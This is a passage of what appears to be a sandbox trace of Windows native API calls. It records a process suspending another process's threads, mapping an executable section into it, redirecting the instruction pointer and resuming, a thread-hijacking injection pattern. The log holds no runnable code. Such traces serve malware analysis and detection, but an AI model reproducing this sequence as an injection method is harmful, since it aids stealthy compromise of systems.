ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0x8ec) | out: ThreadHandle=0x19ea68*=0x104) returned 0x0 [0195.492] NtSuspendThread (in: ThreadHandle=0x104, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0195.493] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0xbc, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x1e50000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0195.500] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x30ff18, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x30fec0, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x30fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.501] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.502] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x181200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x182000) returned 0x0 [0195.511] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xbc, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x181200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x830000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x182000) returned 0x0 [0195.540] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x32a0000) returned 0x0 [0195.557] NtClose (Handle=0x10c) returned 0x0 [0195.557] NtSetContextThread (ThreadHandle=0x104, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x30ff18, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x30fec0, Eip=0x91e707, SegCs=0x23, EFlags=0x246, Esp=0x30fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.558] NtResumeThread (in: ThreadHandle=0x104, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.558] NtClose (Handle=0xbc) returned 0x0 [0195.558] NtClose (Handle=0x104) returned 0x0 [0195.559] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0x8f0, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x104) returned 0x0 [0195.559] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0195.559] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0195.559] NtReadVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0195.559] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0195.565] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0x8e0) | out: ThreadHandle=0x19ea68*=0xbc) returned 0x0 [0195.565] NtSuspendThread (in: ThreadHandle=0xbc, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0195.566] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x104, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x1ca0000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0195.573] NtGetContextThread (in: ThreadHandle=0xbc, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x45fc70, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x45fc18, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x45fbfc, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, 